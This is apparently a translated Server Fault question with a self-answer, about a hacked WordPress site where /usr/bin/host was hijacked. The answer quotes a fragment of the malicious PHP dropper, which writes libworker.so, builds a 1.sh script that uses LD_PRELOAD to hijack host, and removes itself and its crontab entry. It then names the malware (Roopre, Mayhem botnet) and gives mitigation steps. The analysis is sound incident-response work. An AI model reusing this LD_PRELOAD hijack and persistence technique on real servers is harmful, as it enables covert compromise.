AskOverflow.Dev

AskOverflow.Dev Logo AskOverflow.Dev Logo

AskOverflow.Dev Navigation

  • 主页
  • 系统&网络
  • Ubuntu
  • Unix
  • DBA
  • Computer
  • Coding
  • LangChain

Mobile menu

Close
  • 主页
  • 系统&网络
    • 最新
    • 热门
    • 标签
  • Ubuntu
    • 最新
    • 热门
    • 标签
  • Unix
    • 最新
    • 标签
  • DBA
    • 最新
    • 标签
  • Computer
    • 最新
    • 标签
  • Coding
    • 最新
    • 标签
主页 / server / 问题 / 705217
Accepted
Marki555
Marki555
Asked: 2015-07-13 13:59:03 +0800 CST2015-07-13 13:59:03 +0800 CST 2015-07-13 13:59:03 +0800 CST

/usr/bin/host 由被黑的 PHP 脚本执行

  • 772

今天我注意到 Apache 网络服务器上的请求率异常高,并且传入的网络流量也非常高。检查 Apache 的 mod_status 页面后,我发现有问题的 URL 来自 path www.server.com/www/wp-includes/js/tinymce/plugins/wpautoresize/。事实上,我在那里发现了几个被黑(混淆)的 PHP 脚本。

还注意到 www-data 用户执行的奇怪过程:

www-data  7300 10.8  0.1 2122900 18768 ?       Ssl  Jul11 121:47 /usr/bin/host

检查/proc/7300/cmdline显示这确实是原始/usr/bin/host二进制文件。netstat -anp显示它打开了许多 HTTP 连接,因此不知何故该二进制文件被滥用。debsums确认二进制校验和正常。由于该过程是在 www-data 用户下运行的,我没有理由相信服务器本身受到了损害。

该二进制文件是如何被滥用的?

编辑:这不是广泛的“如何处理受损的服务器”问题。而是一个关于一种特定类型的滥用的问题(并且已经是一个答案),它在技术上是如何完成的,因为这个特殊案例在它的工作方式上非常有创意。看来这已经流行了好几年了(旧线程和 2012 年的问题),我本周遇到了它。

php
  • 1 1 个回答
  • 4823 Views

1 个回答

  • Voted
  1. Best Answer
    Marki555
    2015-07-13T13:59:03+08:002015-07-13T13:59:03+08:00

    在挖掘了被冒犯的 PHP 脚本和谷歌搜索(这个线程)的源代码之后,我找到了一个解释。

    这是system.php我发现的代码的一部分:

    <?php
    // ...
    $n = file_put_contents("./libworker.so", $so);
    $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    $HBN=basename("/usr/bin/host");
    $SCP=getcwd();
    @file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
    // ...
    

    如何/usr/bin/host参与更高级一些。程序使用库(.so文件)来实现它们的某些功能。用户可以LD_PRELOAD在启动合法二进制文件之前预链接 () 一些 .so 文件以更改其行为方式。

    正如你所看到的,这个脚本创建了一个文件libworker.so并使用LD_PRELOAD环境变量来预加载它,所以合法host的二进制文件正在做一些完全不同的事情。

    它创建一个1.shshell 脚本并尝试以多种方式执行它(直接,使用at命令,使用 cron)。之后它立即从磁盘中删除脚本和库文件,因此它不会被注意到。

    首先发生的事情是一些易受攻击的 Wordpress 插件被滥用,攻击者能够将他们的文件放入可写字的目录中。

    缓解意味着分析该域的旧访问日志文件并尝试查找POST对异常位置的任何请求 - 例如直接访问 WP/Joomla 插件的 PHP 文件是不寻常的。然后删除所有发现的混淆 PHP 文件,修复目录权限,终止正在运行的host进程并监视日志文件以查找任何重新破解的尝试。

    编辑:我从 ESET 得到信息,他们已经检测到这个特定的库以及其他版本。防病毒公司将其命名为Roopre,它似乎被用作Mayhem僵尸网络的一部分。

    深入分析Mayhem 僵尸网络。

    深入分析这个漏洞。

    • 10

相关问题

  • 用户特定的 Php.ini 当 php 作为模块运行时?

  • 使 php mail() 函数在 ubuntu-server 上工作的步骤是什么?

  • Web 服务器和数据库服务器位于完全不同的位置

  • PHP 作为 CGI 还是 Apache 模块?

  • 通过 VPN 连接什么是远程服务器 IP?

Sidebar

Stats

  • 问题 205573
  • 回答 270741
  • 最佳答案 135370
  • 用户 68524
  • 热门
  • 回答
  • Marko Smith

    新安装后 postgres 的默认超级用户用户名/密码是什么?

    • 5 个回答
  • Marko Smith

    SFTP 使用什么端口?

    • 6 个回答
  • Marko Smith

    命令行列出 Windows Active Directory 组中的用户?

    • 9 个回答
  • Marko Smith

    什么是 Pem 文件,它与其他 OpenSSL 生成的密钥文件格式有何不同?

    • 3 个回答
  • Marko Smith

    如何确定bash变量是否为空?

    • 15 个回答
  • Martin Hope
    Tom Feiner 如何按大小对 du -h 输出进行排序 2009-02-26 05:42:42 +0800 CST
  • Martin Hope
    Noah Goodrich 什么是 Pem 文件,它与其他 OpenSSL 生成的密钥文件格式有何不同? 2009-05-19 18:24:42 +0800 CST
  • Martin Hope
    Brent 如何确定bash变量是否为空? 2009-05-13 09:54:48 +0800 CST
  • Martin Hope
    cletus 您如何找到在 Windows 中打开文件的进程? 2009-05-01 16:47:16 +0800 CST

热门标签

linux nginx windows networking ubuntu domain-name-system amazon-web-services active-directory apache-2.4 ssh

Explore

  • 主页
  • 问题
    • 最新
    • 热门
  • 标签
  • 帮助

Footer

AskOverflow.Dev

关于我们

  • 关于我们
  • 联系我们

Legal Stuff

  • Privacy Policy

Language

  • Pt
  • Server
  • Unix

© 2023 AskOverflow.DEV All Rights Reserve